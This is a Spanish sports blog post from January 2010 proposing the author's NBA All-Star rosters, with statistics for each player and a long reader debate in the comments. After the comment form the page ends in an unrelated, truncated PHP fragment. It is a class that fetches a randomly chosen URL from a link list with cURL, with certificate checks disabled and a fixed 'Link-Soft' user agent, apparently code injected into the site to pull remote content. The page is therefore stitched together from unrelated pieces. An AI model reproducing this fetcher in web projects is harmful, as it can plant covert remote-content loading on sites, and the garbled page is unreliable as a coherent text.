Mis equipos para el All Stars

05 de January de 2010 por txusma

Falta muy poquito para que se celebre el All Star 2010 en Dallas y por tanto falta muy poquito también para que sepamos qué jugadores van a formar los quintetos titulares de ambas conferencias gracias a los votos de los internautas. De momento destacan las presencias en estos quintetos de jugadores como Allen Iverson y sobretodo Tracy McGrady, lo que demuestra hasta que punto estas votaciones no se rigen por criterios estrictamente objetivos. ¿Alguien duda de que si hubiese podido ser elegido, Yao Ming aparecía en el quinteto titular del Oeste?

Así que obviando las votaciones, aquí van los que deberían ser, para mí, los 24 jugadores que disputen el AllStars:

QUINTETOS TITULARES

Este

Rajon Rondo: Posiblemente el mejor jugador de Boston este año y eso que no forma parte del “Big Three”. 13.2 puntos, 9.6 asistencias, 4 rebotes y 2.6 robos por partido.

Dwyane Wade: 26 puntos, 5 rebotes y 6.2 asistencias por partido. Ahora mismo no hay ninguno otro base o escolta en el Este que le llegue ni a la suela de las zapatillas.

Lebron James: 29 puntos, 7 rebotes y 7.8 asistencias, números que no están al alcance de nadie más.

Chris Bosh: Toronto está en la sexta posición del Este y él vive la mejor temporada de su carrera con 23.7 puntos y 11.3 rebotes por partido. No hay ningún otro ala-pívot en su conferencia que se acerque, ni remotamente, a su nivel.

Dwight Howard: Indiscutible a pesar de no realizar su mejor temporada. 17 puntos y 13.3 rebotes son plaza segura en el quinteto titular del All Stars.

Oeste

Chris Paul: A pesar de todos los problemas, New Orleans está con un 50% de victorias y a un paso de entrar de nuevo en los Playoffs. Y el único culpable es su base que promedia 20 puntos, 10.5 asistencias, 4.5 rebotes y 2.2 robos por partido.

Kobe Bryant: Su trascendencia va más allá de sus números que igualmente son espectaculares (30 puntos, 5.6 rebotes y 4.6 asistencias por partido). Su sucesión de buzeer beaters de los últimos días es impagable y recordemos que juega, teóricamente, lesionado.

Carmelo Anthony: Este año el alero de los Nuggets empezó la temporada a nivel MVP y aunque ha bajado un poco el pistón se consolida en las listas para decidir el MVP. Con Kobe, el único jugador en promediar 30 o más puntos por partido a los que añade 6.4 rebotes y 3.3 asistencias.

Dirk Nowitzki: Si Dallas aparece en segunda posición del Oeste es, sobretodo, gracias a su gran figura. El alemán promedia 25 puntos y 8 rebotes por partido.

Marc Gasol: No es chauvinismo ni mucho menos. Marc Gasol es, sin ninguna duda, el mejor pívot puro de la conferencia Oeste en estos momentos. 15.2 puntos y 10 rebotes para 23 puntos de eficiencia por partido. El truco de poner a Amare Stoudamire de pívot en las votaciones a pesar de ser considerado alero en la misma página de NBA.COM sólo sirve para regalar al de Phoenix una presencia en el All Star.

SUPLENTES

Este

Joe Johnson: Injustamente maltratado en las votaciones, su temporada es también muy buena como lo demuestran los 20 puntos, 5.2 rebotes y 4.9 asistencias que promedia en cada encuentro. Aunque los Hawks se esten desinflando en estas últimas jornadas, es de justicia que su jugador más destacado participe en el AllStars.

Andre Iguodala: A pesar de jugar en uno de los peores equipos (aunque parece que muestran algún signo de recuperación) el alero de los Sixers promedia unos excelentes 18.5 puntos, 6.8 rebotes, 5.6 asistencias y 1.8 robos. Completísimas cifras tanto en ataque como en defensa.

Josh Smith: Otro representante de los increíbles Hawks de la 2009/2010. 15 puntos, 8 rebotes, 1.5 robos y 2.27 tapones, el mejor de toda la competición.

Gerald Wallace: Hay que leerlo 2 veces para creerlo. El alero de los Bobcats es el cuarto mejor reboteador de la liga con casi 12 capturas por encuentro y encima anota 18 puntos y roba 1.7 balones. Jamás había estado a este nivel. Sin duda, nivel All Stars.

Kevin Garnett: Juega a medio gas y tan solo 30 minutos por partido pero aún así promedia 15 puntos y 7.6 rebotes. Tan solo su compañero Paul Pierce podría discutirle su presencia en el All Stars.

David Lee: El año pasado el ala-pívot de los Knicks ya estuvo a un nivel superlativo y este año mantiene o incluso mejora ese nivel. La mejor posición en la clasificación de New York debería llevarle al All Stars.

Brook Lopez: La verdad es que tras elegir el quinteto del Este, las dudas acechan y es que esta conferencia está bastante huérfana de grandes jugadores (tan solo hay que comparar los banquillos de ambas conferencias y los jugadores que se quedan fuera). Particularmente la posición de pívot es un auténtico erial y tampoco convencen del todo otras opciones como Gilbert Arenas, Vince Carter o Al Horford (sería excesivo que hubiera 3 halcones). Visto lo visto, prefiero apostar por un jugador que promedia 18.8 puntos y 9.7 rebotes por partido a pesar de hacerlo en el peor equipo de la competición.

Oeste

Steve Nash: Phoenix está cuajando una buena campaña y como siempre la culpa es del canadiense. 18.4 puntos y 11.2 asistencias por encuentro. El máximo asistente de la liga.

Deron Williams: Que Deron Williams no haya disputado todavía un All Stars es una de las más grandes injusticias de este acontecimiento. A pesar de no ser el mejor año en cuanto a los colectivo se refiere, sus 19.5 puntos, 4 rebotes y 9.8 asistencias bien valen para participar de una vez por todas.

Brandon Roy: Con todo lo que está cayendo en Portland, los Blazers se mantienen en plazas de Playoffs. Los 23 puntos, 4.7 rebotes y 5 asistencias de su escolta titular son el puntal donde se sustentan en estos momentos.

Kevin Durant: No hay palabras para definir la temporada de Kevin Durant y la de los Thunder. En el aspecto individual, 28.4 puntos, 7 rebotes, 3 asistencias y un robo por partido. En el aspecto colectivo, más del 50% de victorias y en puestos de playoffs desde no se sabe cuanto. All Star indiscutible.

Zach Randolph: El otro gran culpable del gran papel de los Grizzlies este año. Zach sigue haciendo sus números (20 puntos, 11.4 rebotes) pero esta vez al servicio del colectivo. Será difícil que le veamos en Dallas porque es uno de esos jugadores marcados, pero sin duda se lo merece.

Pau Gasol: Peleándole el puesto en el quinteto titular a Nowitzki. Más reboteador que nunca (11.5 rebotes por partido) es tan culpable como Kobe de la primera posición de los Lakers en la liga.

Tim Duncan: Pasan los años, pasan las modas pero él se mantiene immutable y por mucho tiempo. El día que retire será un día muy triste. A sus 33 años sigue siendo la pieza angular de los Spurs y está incluso mejor que el año pasado. 20 puntos, 10.2 rebotes, 1.8 tapones y destilando clase por sus poros en cada partido.

Comenta

31 comentarios a esta entrada

  1. jonatan dice:
    #1

    Totalmente de acuerdo contigo, respecto a Marc Gasol estoy aún mas de acuerdo la progresion que a dado de un año a otro y el apaño de la NBA para ayudar a Amare deberian ser “castigados”.
    La única pega que le veo es Brandon Roy, me parece que Monta Ellis esta haciendo un temporadon y deberia de ser reconocido 25.7 pts , 4.3 rb, 5.2 a y 2.2 robos son numeros de all star lo mires por donde lo mires, el record del equipo puede perjudicarle.
    Un saludo¡

      Citar

  2. Txusma dice:
    #2

    Esos números son de crack pero has obviado las 4.3 pérdias por partido que promedia, el que más en toda la NBA. Unido al récord del equipo creo que me quedo con Brandon Roy.

      Citar

  3. westcoastrealbetis dice:
    #3

    soy de los sixers y la verdad se nota k no sigues muxo a la franqucia y k pa poner a iguodala ahi solo t fijaste en los numero xk u temporada no esta siendo wena ni mucho menos antes k el podria estar brand,y yo no veo mal k este iverson como reconocimiento a su carrera ahora k esta en los ultimos años el all star es un espectaculo y tienen k estar los mas mediaticos y losk den mas espectaculo,si tuviera k elegir entre yao o shaq pal all star eligiria a shaq sin ninguna duda….
    por lo demas me gusta muxo tu blog lo leo casi siempre, sigue asi!! 😉

      Citar

  4. Hynreck dice:
    #4

    Txus, lo de Marc si que me parece un poco sobrada, pero lo de Iguodala es columpiarse demasiado. Si Iggy merece este año que está jugando como el culo (bueno no, como el puto culo)ir al all-star es para no volver a ver un espectaculo circense de estos nunca más…

      Citar

  5. NBA LAKERS BLOG dice:
    #5

    Todo perfecto, pero te olvidaste del mejor centro del Oeste, y que probablemente formará parte del quinteto titular: Amare Stoudamire.

    Marc Gasol no esta a nivel All-Star todavia…

    Tu criterio es válido, pero te basas demasiado en estadísticas… en el All-Star vale más el prestigio del jugador, por eso jugarán Paul Pierce y no el chiste que pusiste con Brook Lopez, o el cambio que cité al principio…

    Ahi juegan las estrellas propiamente dichas, no los que mejores numeros tengan. Tampoco me entra en la cabeza como dejaste afuera a Chauncey Billups, pero bueno, ya bien anticipas en el titulo: “MIS equipos para el All-Star”.
    A mi me agrada tu propuesta, ojala sea asi, pero bueno… ya sabemos la fama en la NBA como es…

    Un fuerte abrazo! Nos encanta tu blog…

    PM

      Citar

  6. Txusma dice:
    #6

    El blog no es sólo mío, eh…

    A ver, lo primero que digo es que esto del All Stars es muy subjetivo. Tan solo viendo las votaciones es posible que Iverson y McGrady jueguen de titulares. Es eso menos chiste que lo de Brook Lopez?
    Y después, fijaos en el Este y decidme que jugador metemos en lugar de Iguodala, por ejemplo. La única opción viable es Paul Pierce, jugador que estoy seguro que estará en All Stars en lugar de Iguodala, Lee o Lopez, pero es que no hay nadie más. De hecho, Iguodala ha sido el último jugador que decidí y al final, como sus números objetivamente hablando tan poco son muy malos y no queria meter a 3 tios de los Celtics pues le he escogido a él. Repasando los diferentes jugadores me ha sorprendido lo dificil que ha sido escoger a 12 tios en el Este….
    En cambio en el Oeste he tenido que dejar fuera a Chauncey Billups y os prometo que no queria pero… a quien dejamos fuera? A Deron o Roy?
    Y bueno, lo de Marc Gasol no entiendo porque lo veis tan sobrada. Esta claro que es probable q ni siquiera vaya al All Star pero por favor, decidme un pivot en el Oeste mejor que él en estos momentos. Nene? Bynum? Stoudamire es un ala-pivot como la copa de un pino aunque se pueda votar como center y aunque fuera pivot esperate a ver…

      Citar

  7. sayim dice:
    #7

    Pues aun que me fastidie (porque me cae bien, pero no se lo merece) yo creo q el center suplente en el E sera el Perro Grande, como homenaje a su carrera y a todos los shows que lleva montado en todos estos eventos. Creo que aun el año pasado fue MVP compartido con Kobe. Por lo menos nos haremos unas risillas…

    Un saludo y gracias por el blog

      Citar

  8. Txusma dice:
    #8

    Hombre, es que Shaq es de los jugadores que mejor entiende de que va esto del All Star. Dosis justo de espectaculo e intensidad. Pero como yo me he basado en el rendimiento de este año pues no me parecería justo que fuera. Evidentemente que irá en lugar de, por ejemplo, Brook Lopez.

      Citar

  9. Love Denise dice:
    #9

    No quiero ser aguafiestas, pero el All Star Game siempre me ha parecido la mayor cagada de la NBA, al menos en términos deportivos. A mí me gusta ver mates y jugadas espectaculares con una seria defensa enfrente, no con una defensa que te hace un aclarado para que machaques y la gente flipe. Sinceramente y desde mi humilde opinión, lo único que me interesa es el concurso de triples, que es lo más objetivo que hay, porque el Rookie Vs Sphomores es un partido infumable, respecto al concurso de mates, pienso que ya no hay nada nuevo que inventar, solo una copia de una mala copia, y el ganador se conoce de antemano por popularidad, y sobre el All Star Game, si van Iverson y McGrady, con eso se responde la seriedad que hay y lo justas que son las votaciones.
    Yo preferiría ver un EEUU VS Nba internacional pero tomado en serio, o un torneo tipo Copa del Rey de baloncesto sería muy bonito, puesto que con el formato actual de NBA , hay buenos equipos (Nuggets, Hawks, Blazers, Mavs, Suns, etc…) que lo tienen muy complicado para ganar eliminatorias a 7 partidos y por tanto el campeonato a LAK, Clev, Orl y Bos. En cambio a 1 partido en sede neutral, podría ganar cualquiera.

      Citar

  10. Viva_Dirk dice:
    #10

    Txus, yo te digo un center con números tan buenos o mejores que los de Marc: Chris Kaman.

      Citar

  11. GOT dice:
    #11

    Estoy con txusma, que objetivamente esos jugadores serian por calidad y estadisticas los que tendrian que ir. Pero siendo el all-star lo que es, es decir, un show, hay me faltan tanto Shaq como Amaré e incluso Iverson por lo que ha sido, pero lo de T-Mac bufff…me parece un poco injusticia.
    Yo antes que a Iguodala llevaba antes a Mo Williams, aunque para gustos….colores.

      Citar

  12. Tobal dice:
    #12

    Me parece increible que la gente vote a Iverson y McGrady,cuando son dos jugadodres que ahora mismo no pintan nada en este evento,donde juegan los mejores de la temporada y por supuesto que Marc Gasol debe de ir porque tiene mucho mérito lo que está haciendo en ese equipo,por el que casi nadie apostaba para estar con ese balance tan positivo.Deron Williams tambien debe de ir ya de una santa vez,al Allstar,cuando es uno de los tres o cuatro mejores bases de la liga.

      Citar

  13. Txusma dice:
    #13

    Acepto barco, Viva. Lo pondrías por delante del español como titular? Ahora que lo veo tal vez sea excesivo premio 2 grizzlies en el All Star y con Kaman la cosa podría quedar más compensada en cuanto a equipos. Pero es que lo del Oeste es de traca: se siguen quedando fuera Amare, Billups o M. Gasol/Kaman.

      Citar

  14. sergio dice:
    #14

    Esta bien claro que la competitividad de puestos en el Oeste no es la del Este. En eso coincidimos todos.
    Ninguno habeis nombrado a Carter siendo quien es y lo que le ha dado a esta clase de eventos. Ahora que esta en un equipo ganador creo que ira seguro (Igoudala a mi tambien me chirria) aunque por sus numeros quizas no lo merezca.

    Me parecen elecciones correctas en cuanto a valoracion y numeros de los jugadores.

    Tambien me apetece nombrar otros que no habeis incluido y pueden tener papeletas (algunos remotas pero la mayoria ya han sido All-Star): Granger, Allen, Lewis, Rose, Bogut,….

      Citar

  15. David dice:
    #15

    Recogiendo la propuesta de Denise… buff, eso sí que sería la leche, tanto un usa vs. mundo, como un torneo del KO, estaría cojonudo para no levantarse del sofa (o de la mesa del escritorio) en una semana, en vez del churripartido que está bien para ver los mejores momentos, pero poco más (por no hablar del partido de rookies)

      Citar

  16. Hynreck dice:
    #16

    Por TMac no os preocupeis, ya ha dicho que renunciaría a ir (Por dignidad propia me parecería lógico), así que no conteis con él en las quinielas, aún así a mí me alegra ver el cariño con el que sigue contando por parte de la gente.

      Citar

  17. xapa_croack dice:
    #17

    Ya llevo 2 años sin ver el partido de all star, y con la marcha que lleva de ser la remora de fila titular creo k este año casi mejor k hare alguna cosa mejor como dormir.

    Los rookies si k los vere.

      Citar

  18. Kajie dice:
    #18

    Love denise, lo primero puede que lo hagan, pero lo segundo yo creo que en la vida…

      Citar

  19. Love Denise dice:
    #19

    ya veremos, pero sería 100 billones de veces más interesante que el horrendo partido de rookies, y el infame “partido” saltarín de las estrellas. Como dato, el All Star tiene cada vez menos audiencia en EEUU, cosa que no me extraña lo más mínimo.

      Citar

  20. Hynreck dice:
    #20

    A quienes veis para el rookies vs sophomores?
    Soy el único que ve una paliza de época de los de segundo año?

      Citar

  21. Txusma dice:
    #21

    Hombre… Jennings, Tyreke, Hansbrough, Harden, Flynn, Curry, etc… tampoco son mancos aunque claro, los de segundo año son jodidamente buenos.

      Citar

  22. Asdare dice:
    #22

    Haber, estoy completamente de acuerdo con vosotros y preferiria un usa vs mundo o un torneo estilo copa del rey, pero lo vemos desde nuestra perspectiva, y me explico:
    la funcion del all-star desde mi punto de vista es cambiar un poco el chip y ofrecer algo diferente a lo del resto del año, y llamar la atencion del que ve poco baloncesto. estoy seguro que el que no sigue la nba a diario prefiere ver un par de mates del señor lebron a un orlando-boston como el del dia de navidad, por ejemplo, o sea un partido de a 80 y pocos puntos. y con suerte, gracias al all-star igual acabe enganchandose a esto.

    ademas las 2 ideas anteriores son inviables: una copa en plena temporada me parece justo lo contrario a lo que busca la nba, y lo de usa vs mundo tiene demasiado morbo como para plantearlo siquiera.

      Citar

  23. pcerezo dice:
    #23

    Simplemente decir que como esto es tan subjetivo y que en realidad es para pasar el tiempo y que el equipo que yo diga o los demás no son dogmas de fé, ahí va el mío:

    – Este: Rondo, Wade, Lebron, Bosh, Howard. (Mo Williams, Joe Johnson, Pierce, Gerald Wallace, Josh Smith, Garnett, Desierto).
    – Oeste: Chris Paul, Bryant, Caramelo, Nowitzki, Randolph. Nash, Deron, Roy, Durant, Duncan, Gasol, Stoudamire.

    Es complicadísimo encontrar un center suplente en el Este de ciertas garantías. Sinceramente creo que ni Brook Lopez, ni David Lee, ni Shaquille están en estos momentos a la altura mínima de lo que un All Star se requiere. Claro que hay que coger 12 jugadores pero es que el nivel está bajísimo en el Este.

    En el Oeste se quedan fuera jugadores tremendos que están haciendo una gran temporada como Marc, Nene, Kalman, Monta Ellis, Rudy Gay, Aaron Brooks…

    Un saludo,
    Pablo

      Citar

  24. Love Denise dice:
    #24

    ok asdare, pero yo, y creo que casi toda la gente que le guste este deporte, prefiere ver un mate del señor Lebron en la cara de algún adversario en un partido serio, a un mate de Lebron gracias a que el defensor le hace un aclarado. Dicho de otra forma, también se ven mates buenos y sobretodo con más mérito en un partido serio que en All Star. Y se prefiere ver un Orlando-Boston a 80 puntos lleno de errores pero emocionante, a un partidillo de rookies, o al atroz concurso del jugador, la jugadora WNBA y la leyenda, o el concurso de habilidades.

      Citar

  25. Asdare dice:
    #25

    love denise, efectivamente a cualquiera que le guste el baloncesto prefiere una partido en serio que no una pachanga, pero no estoy tan seguro que se cumpla para el que lo vea muy de cuando en cuando.

      Citar

  26. Txusma dice:
    #26

    No sé, pcerezo (pablo? Pq tengo la sensación de que es pablo?), yo sí creo que David Lee tiene nivel para jugar el All-Stars. No es que este año se haya disparado en las estadisticas, es que ya el año pasado estuvo a gran nivel tanto anotador como reboteador. Evidentemente no está al nivel de otros pero (y yo ya me preparo para recibir de lo lindo) tampoco lo veo muy lejos de, por ejemplo, el actual Amare Stoudamire. A lo mejor si cambiamos a Nash por Duhon vemos mas claras las similitudes.

      Citar

  27. TheDeerHunter dice:
    #27

    Sin entrar en cómo deberían estar puestas las posiciones para los votos, mis equipos para el all-star no se diferenciarían demasiado de los de pcerezo:

    west: CP3; KB24; Melo; Dirk; Stat — Nash, Deron, Roy, Durant, Duncan, Gasol, y lo mismo me da con Randolph o Kaman.

    east: Rondo; Wade; LeBron; Garnett; Howard — Derrick Rose; Joe Johnson; Pierce; Gerald Wallace; Josh Smith; Bosh y Bogut.

    La presencia de Shaq no es justa a nivel de rendimiento, pero sí en otros sentidos que marcan el evento (sin entrar a valorarlos ahora mismo) Lo de Iverson, quizás no tanto. Pasa parecido con Ray Allen, que creo que esta vez se queda fuera.

    Lo del tema de los guards es lo más cantarín del evento. Entre los casos TMac&Iverson y lo de Rondo, Deron Williams y Brandon Roy serían razones suficientes como para dar la votación por nula.

      Citar

  28. Txusma dice:
    #28

    Y es justo a nivel de rendimiento poner a Garnett por delante de Bosh? Y Bogut por delante de David Lee? Y Amare por delante de Zach Randolph? Explicamelo porque no lo entiendo…

      Citar

  29. Jabho dice:
    #29

    A mi del All Star lo unico que me interesa un poco es la lista de elegidos de cada cual, el morbo de ver quien va y quien no pero muy poco más…

    Dicho esto en el Este Iguodala al que he visto en 3 o 4 partidos no me ha gustado nada aunque eso, hace numeros. David Lee me gusta más pero tampoco. Me quedo antes que con estos con Pierce que es un pedazo de crack y con Brook Lopez que la verdad es que si le veo nivel de All Star.

    El Oeste es mejor y mas complicado hacer la selección que duda cabe. Pero CP3, Deron y Nash creo que estan por delante de Billups. Marc está haciendo un grandisimo año, pero como decis al nivel de Nene o Kaman (que no es poco).

    De todas formas que no cuenten conmigo para verlo

      Citar

  30. Jaime gomez dice:
    #30

    Estoy de cuerdo con deron william ese es un puto jugador nOO me sorprenderia verlo de titular y no lo ponen ni de banca q putadaa!!

      Citar

  31. TheDeerHunter dice:
    #31

    Oye, que SÍ le han elegido los entrenadores

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>